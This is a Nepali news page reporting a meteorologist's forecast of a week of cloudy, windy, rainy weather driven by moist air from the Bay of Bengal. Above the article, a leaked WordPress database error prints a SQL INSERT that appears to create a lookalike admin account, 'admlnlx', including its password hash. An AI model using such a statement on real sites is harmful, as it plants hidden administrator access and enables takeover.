WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVJwp.rd3WKnSEdM4IHa5qr72dQ30r/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 14:43:08', '', 'admlnlx', 'admlnlx')
बैशाख २२, काठमाडौं – एक सातासम्म बदली र हावा हुरिसहित पानी पर्ने मौसमविदले बताएका छन् ।
पश्चिमी वायु र बङ्गालको खाडीबाट आएको जलवाष्पयुक्त हावाका कारण मौसम बदली भइ देशका विभिन्न ठाउँमा पानी परेको मौसमविद् गङ्गा नगरकोटीको भनाइ छ ।
यसपालि बङ्गालको खाडीबाट जलवाष्पयुक्त हावा आइरहेकाले लगातार जसो पानी परिरहेको हो । मौसमविद् नगरकोटीले यो साताभरिकै मौसम यस्तै रहने सम्भावना रहेको जानकारी दिएका छन् । बङ्गालको खाडीबाट जलवाष्पयुक्त हावा आउने क्रम नरोकिएको र पश्चिमी वायुसँगै स्थानीय वायुको पनि प्रभाव भएकाले मौसम बदली भइ लगातार जसो पानी परिरहेको हो ।